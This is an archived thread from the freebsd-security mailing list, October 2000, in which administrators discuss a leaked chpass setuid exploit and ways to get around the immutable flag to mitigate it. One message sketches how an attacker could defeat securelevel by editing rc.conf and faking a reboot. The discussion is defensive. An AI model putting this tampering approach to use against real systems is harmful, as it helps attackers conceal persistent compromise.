3 and 5. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:18:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.flexabit.net (ns1.flexabit.net [64.198.230.130]) by hub.freebsd.org (Postfix) with ESMTP id AFEB137B503 for ; Tue, 3 Oct 2000 23:18:23 -0700 (PDT) Received: from LIQUID.uiuc.edu (wakeland-103.flexabit.net [64.198.239.103]) by ns1.flexabit.net (Postfix) with ESMTP id B937AFA99; Wed, 4 Oct 2000 01:18:17 -0500 (CDT) Message-Id: <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> X-Sender: yardley@students.uiuc.edu X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 04 Oct 2000 01:18:25 -0500 To: Mike Silbersack From: Tim Yardley Subject: Re: Fwd: BSD chpass Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I would just like to point out that it was posted to bugtraq because the original work in progress exploit was leaked. Venders are always notified once you have something that works, and caddis is not in exception to this rule. The leak caused this bug to be posted before it was meant to be. If you do notice, obsd posted an advisory right after, which does show that at least some people were in the "know". /tmy At 12:24 AM 10/4/2000, Mike Silbersack wrote: >Looks like the guy didn't want to talk to vendors before posting. > >Mike "Silby" Silbersack -- Diving into infinity my consciousness expands in inverse proportion to my distance from singularity +-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- - --------------+ | Tim Yardley (yardley@uiuc.edu) | http://www.students.uiuc.edu/~yardley/ +-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- - --------------+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:41:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 3C24137B502; Tue, 3 Oct 2000 23:41:07 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id BAA28639; Wed, 4 Oct 2000 01:40:53 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-70.max1.wa.cyberlynk.net(207.227.118.70) by peak.mountin.net via smap (V1.3) id sma028633; Wed Oct 4 01:40:35 2000 Message-Id: <4.3.2.20001004010120.00b1cb50@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 04 Oct 2000 01:35:21 -0500 To: "Daniel C. Sobral" , Kris Kennaway From: "Jeffrey J. Mountin" Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <39DAC368.C6C213B7@newsguy.com> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:43 PM 10/4/00 +0900, Daniel C. Sobral wrote: >Kris Kennaway wrote: > > > > I think a formal MFC process may be too stifling, unless we have a > > VERY responsive MFC team. Consider that we don't want the same thing > > to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so > > much that merging bugfixes became difficult. > >I don't think the comparision is appropriate. The divergence between 3.x >and 4.x came at the very beginning of 3.x's life, and it was not merged >back because it was too big a change. Aren't the SMP changes in -current similar and will reduce the amount of code that can be backported to -stable with relative ease. "Allowed to diverge" smacks of halting progress and some changes are painful. I'm not one to get into detail or give examples, which would be better suited on -arch and -hackers, but will say that divergence in userland is more likely to slow/stunt/make a PITA out of MFC'ing than kernel changes. Don't think the pain of change can be avoided, but in general some do put more thought into changes than others and take the time to consider if -stable can benefit. Simply are the gains worth the cost. Can't really come up with a blanket to wrap the ideas here simply. Can say that after the SMP changes in -current the ratio of -current to -stable commits dropped. In and of itself that doesn't say much. There are quite a few commits to -stable (even since 4.1.1) and even 3.x and lest we forget that -current is the development branch. Some things just have to wait. I recall waiting for 3.x and SMP, many improvements again in 4.x, and am waiting once more (not sure for what just yet, but I'm waaay behind with my -current mail. Hardly expect more then some of the bigger changes (if any) will make it back from -current to -stable. Almost seems like to solve the divergence issue we must merge -current and -stable, making the latter a well tested snapshot of the former. Not one of them, but there were cases for a production environment where -current was needed. Prior to 4.0R NFS was probably the best example. It is also quite possible that the divergence and Jordan's observation that it's hard to get -current developers to MFC, that with the fewer changes filtering back that more time was spent working on the "new and improved" to make 4.0 such an excellent release. Just may not be possible to have our cake and eat it too. Personally I think endless discussions that go nowhere have been hurting the amount of comitting. Recently the amount of commits seems to have slowed quite a bit. This may be a good thing if the developers are wading through their mail. Perhaps those of us that don't code should be a bit more quiet. This thread is an exception, but -security has gone to pot and yes this is CC'd to -security, but no longer belongs there. Nor does it's spin-off, which I plan to wade through in the hope of a glimmer. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 0: 8:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 932B737B502; Wed, 4 Oct 2000 00:08:31 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e9478Rf29652; Wed, 4 Oct 2000 00:08:27 -0700 (PDT) Date: Wed, 4 Oct 2000 00:08:27 -0700 From: Alfred Perlstein To: Nate Williams Cc: Kris Kennaway , Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001004000827.B27736@fw.wintelcom.net> References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> <200010040349.VAA27923@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010040349.VAA27923@nomad.yogotech.com>; from nate@yogotech.com on Tue, Oct 03, 2000 at 09:49:02PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Nate Williams [001003 20:50] wrote: > > The idea of supporting 2.x fixes isn't fundamentally unsound either, > > it's just that no-one cares enough to do the work. > > For what it's worth, I've got a couple of backported kernel fixes on my > box (including at least one security fix) that are there because I am > stuck on 2.2 due to hardware issues, as well as the fact that it simply > 'works'. > > However, I didn't bother making the fix available because I felt it > might give people the wrong impression. Just because *I* am willing to > support a really old release such as FreeBSD 2, I still feel the users > should be 'encouraged' to use newer releases. By not making those fixes > available (which were in fact rather trivial to do), those folks who > aren't capable of fixing the bugs will be more likely to upgrade their > systems to a newer 'more supported' release. > > I think supporting older releases *really* needs to be done by a > commercial entity (or at least folks who have a commercial stake in > seeing it done), since the majority of developers are in it for the > development fun, and product support is all but fun. :( I think it's a bit selfish of you to keep these fixes to yourself, and it's the wrong attitude to have especially if you're confident about a fix, there's always people stuck with ancient releases in production and could use the help. thanks, -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 0:13: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 9048A37B503 for ; Wed, 4 Oct 2000 00:13:00 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 8A3901F19; Tue, 3 Oct 2000 22:34:22 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: from Mike Silbersack at "Oct 4, 2000 00:16:45 am" To: Mike Silbersack Date: Tue, 3 Oct 2000 22:34:22 -0700 (PDT) Cc: security@freebsd.org From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004053422.8A3901F19@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > For those not subscribed to bugtraq, it's time to remove the suid bit on > chpass. Unfortunatly it isn't that easy if you're running with securelevel > 0 since chpass is installed with the schg (system immutable) flag on by default. Oh well, guess it's time to reboot some hosts. :-/ -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. If only God would give me some clear sign! Like making a large deposit in my name at a Swiss bank. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:11:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id CA4B937B502 for ; Wed, 4 Oct 2000 02:11:06 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gkZs-0000tm-00; Wed, 04 Oct 2000 11:11:04 +0200 Date: Wed, 4 Oct 2000 11:11:04 +0200 (IST) From: Roman Shterenzon To: Garrett Wollman Cc: security@FreeBSD.ORG Subject: blackhole [was: Re: cvs commit: src/etc inetd.conf] In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Garrett Wollman wrote: > > If net.inet.tcp.blackhole is set, an RST will not be emitted. I found it break couple of things in gnome as well. I still don't see any reason for gnome application to try to connect to some ports, when even in orbitrc the ipv4 and ipv6 are disabled, but it's a fact. This is gnome problem however. FreeBSD-GNOME guy, can you hear me ? :) --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:14:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E54A837B502; Wed, 4 Oct 2000 02:14:26 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA74895; Wed, 4 Oct 2000 02:14:26 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:14:26 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Mike Silbersack , security@freebsd.org Subject: Re: BSD chpass (fwd) Message-ID: <20001004021426.A74690@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004053422.8A3901F19@static.unixfreak.org>; from dima@unixfreak.org on Tue, Oct 03, 2000 at 10:34:22PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > chpass. > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > since chpass is installed with the schg (system immutable) flag on by > default. Oh well, guess it's time to reboot some hosts. :-/ mv it into a mode 000 directory :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:15:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 642CA37B503; Wed, 4 Oct 2000 02:15:31 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA75314; Wed, 4 Oct 2000 02:15:31 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:15:31 -0700 From: Kris Kennaway To: Kris Kennaway Cc: Dima Dorfman , Mike Silbersack , security@freebsd.org Subject: Re: BSD chpass (fwd) Message-ID: <20001004021531.B74690@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004021426.A74690@freefall.freebsd.org>; from kris@FreeBSD.org on Wed, Oct 04, 2000 at 02:14:26AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > chpass. > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > since chpass is installed with the schg (system immutable) flag on by > > default. Oh well, guess it's time to reboot some hosts. :-/ > > mv it into a mode 000 directory :-) Oops, can't do that. Reboot :) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:17: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 9DD7137B502; Wed, 4 Oct 2000 02:16:59 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e949GxQ02945; Wed, 4 Oct 2000 02:16:59 -0700 (PDT) Date: Wed, 4 Oct 2000 02:16:59 -0700 From: Alfred Perlstein To: Kris Kennaway Cc: Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004021658.F27736@fw.wintelcom.net> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> <20001004021531.B74690@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001004021531.B74690@freefall.freebsd.org>; from kris@FreeBSD.ORG on Wed, Oct 04, 2000 at 02:15:31AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Kris Kennaway [001004 02:15] wrote: > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > chpass. > > > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > > since chpass is installed with the schg (system immutable) flag on by > > > default. Oh well, guess it's time to reboot some hosts. :-/ > > > > mv it into a mode 000 directory :-) > > Oops, can't do that. Reboot :) Can you mount something over it? -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:19:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04C9A37B503; Wed, 4 Oct 2000 02:19:49 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA76923; Wed, 4 Oct 2000 02:19:48 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:19:48 -0700 From: Kris Kennaway To: Alfred Perlstein Cc: Kris Kennaway , Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004021948.A76230@freefall.freebsd.org> References: <20001004053422.8A3901F19@static.unixfreak.org> <20001004021426.A74690@freefall.freebsd.org> <20001004021531.B74690@freefall.freebsd.org> <20001004021658.F27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004021658.F27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 02:16:59AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: > * Kris Kennaway [001004 02:15] wrote: > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > > chpass. > > > > > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > > > since chpass is installed with the schg (system immutable) flag on by > > > > default. Oh well, guess it's time to reboot some hosts. :-/ > > > > > > mv it into a mode 000 directory :-) > > > > Oops, can't do that. Reboot :) > > Can you mount something over it? Hmm, now that null mounts work in -current you could, actually - make a copy of /usr/bin except for chpass in say /usr/bin2 and null mount it on /usr/bin. Except securelevel disallows mounts, I think :) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:28: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 72FC937B66C; Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 335931F0A; Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004021948.A76230@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 02:19:48 am" To: Kris Kennaway Date: Wed, 4 Oct 2000 02:27:58 -0700 (PDT) Cc: Alfred Perlstein , Kris Kennaway , Dima Dorfman , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004092758.335931F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: > > * Kris Kennaway [001004 02:15] wrote: > > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: > > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: > > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on > > > > > > chpass. > > > > > > > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > > > > since chpass is installed with the schg (system immutable) flag on by > > > > > default. Oh well, guess it's time to reboot some hosts. :-/ > > > > > > > > mv it into a mode 000 directory :-) > > > > > > Oops, can't do that. Reboot :) > > > > Can you mount something over it? > > Hmm, now that null mounts work in -current you could, actually - make a > copy of /usr/bin except for chpass in say /usr/bin2 and null mount > it Actually, I think you can do it without null mounts. mv /usr/bin /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, of course). > on /usr/bin. Except securelevel disallows mounts, I think :) In securelevel >= 2, you can't open a disk for writing unless you're mount(2). I don't know much about null mounts, so I don't know if that will prevent them from working. -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "War doesn't determine who's right, it determines who's left." -- Confuscious To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:32:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BBC7B37B66C; Wed, 4 Oct 2000 02:32:49 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA81888; Wed, 4 Oct 2000 02:32:49 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:32:49 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004023249.B76230@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 04, 2000 at 02:27:58AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > Actually, I think you can do it without null mounts. mv /usr/bin > /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, > of course). I think you're right. Which is a good reason why your /usr/bin should be schg too ;-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 2:58:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A537437B503; Wed, 4 Oct 2000 02:58:36 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA90908; Wed, 4 Oct 2000 02:58:36 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 02:58:36 -0700 From: Kris Kennaway To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004025836.A84165@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 04, 2000 at 02:27:58AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > In securelevel >= 2, you can't open a disk for writing unless you're > mount(2). I don't know much about null mounts, so I don't know if > that will prevent them from working. mounting is still allowed at all securelevels, so you could also null mount over the top of /usr/bin even if /usr/bin is schg. The fact that you can mount volumes at high securelevel seems to mean there is no way you can protect a running system against tampering with a given file (i.e. replacing the runtime-visible instance of a given file). Robert Watson would probably start talking about MAC about now :-) but I'm not sure if this is something which should be fixed as a security problem, or if it is just not practical to expect securelevels to prevent run-time tampering of a given file (leaving aside the issues of protecting the boot path against taking control of the machine at next reboot time, which only happens as a result of incomplete coverage of the relevant files and directories with schg) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3: 9: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 8722337B502; Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 33A4A1F0A; Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004023249.B76230@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 02:32:49 am" To: Kris Kennaway Date: Wed, 4 Oct 2000 03:08:59 -0700 (PDT) Cc: Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001004100859.33A4A1F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 02:27:58AM -0700, Dima Dorfman wrote: > > > Actually, I think you can do it without null mounts. mv /usr/bin > > /usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, > > of course). > > I think you're right. Which is a good reason why your /usr/bin should > be schg too ;-) Then it'd become: mv /usr /usr2, cp everything from /usr2 to /usr except for bin, etc. You get the idea. It does deter them a little bit, though. I usually set /bin, /sbin, /modules (or /boot/kernel in -current), and /boot schg and not worry too much about /usr/[s]bin. IMO, the bottom line is, schg can only prevent an attacker if they don't have a good understanding of the system (which accounts for most of the script kid population). A really clever attacker would modify your securelevel settings in rc.conf, reboot the machine making it look like a panic or power surge (if they know you exclusivly access it remotly), fool around, then change it back. Tripwire on a r/o disk would tell you about it, but you can't do that remotly unless you plan on never touching any system binaries. Or am I missing something? -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "I had a terrible education. I attended a school for emotionally disturbed teachers." -- Woody Allen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3:11:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from gera.nns.ru (gera.nns.ru [195.230.79.10]) by hub.freebsd.org (Postfix) with ESMTP id 8C3A737B503; Wed, 4 Oct 2000 03:11:03 -0700 (PDT) Received: from falcon.nns.ru (daemon@falcon.nns.ru [195.230.79.70]) by gera.nns.ru (8.9.3/8.9.3) with ESMTP id OAA97236; Wed, 4 Oct 2000 14:10:37 +0400 (MSD) (envelope-from abc@nns.ru) Received: from localhost (localhost [127.0.0.1]) by falcon.nns.ru (8.9.3/8.9.3) with ESMTP id OAA11902; Wed, 4 Oct 2000 14:10:12 +0400 (MSD) (envelope-from abc@nns.ru) Date: Wed, 4 Oct 2000 14:10:12 +0400 (MSD) From: "Andrey V. Sokolov" To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004092758.335931F0A@static.unixfreak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Do not forget! chpass, chfn, chsh, ypchpass, ypchfn, ypchsh are hard links! This exploit will work with any command from this set, if little modification of exploits code is done. -- Regards, Andrey V. Sokolov On Wed, 4 Oct 2000, Dima Dorfman wrote: >> On Wed, Oct 04, 2000 at 02:16:59AM -0700, Alfred Perlstein wrote: >> > * Kris Kennaway [001004 02:15] wrote: >> > > On Wed, Oct 04, 2000 at 02:14:26AM -0700, Kris Kennaway wrote: >> > > > On Tue, Oct 03, 2000 at 10:34:22PM -0700, Dima Dorfman wrote: >> > > > > > For those not subscribed to bugtraq, it's time to remove the suid bit on >> > > > > > chpass. >> > > > > >> > > > > Unfortunatly it isn't that easy if you're running with securelevel > 0 >> > > > > since chpass is installed with the schg (system immutable) flag on by >> > > > > default. Oh well, guess it's time to reboot some hosts. :-/ >> > > > >> > > > mv it into a mode 000 directory :-) >> > > >> > > Oops, can't do that. Reboot :) >> > >> > Can you mount something over it? >> >> Hmm, now that null mounts work in -current you could, actually - make a >> copy of /usr/bin except for chpass in say /usr/bin2 and null mount >> it > >Actually, I think you can do it without null mounts. mv /usr/bin >/usr/bin2, chmod 000 /usr/bin2, then remake /usr/bin (without chpass, >of course). > >> on /usr/bin. Except securelevel disallows mounts, I think :) > >In securelevel >= 2, you can't open a disk for writing unless you're >mount(2). I don't know much about null mounts, so I don't know if >that will prevent them from working. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 3:22:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B5DF837B66C; 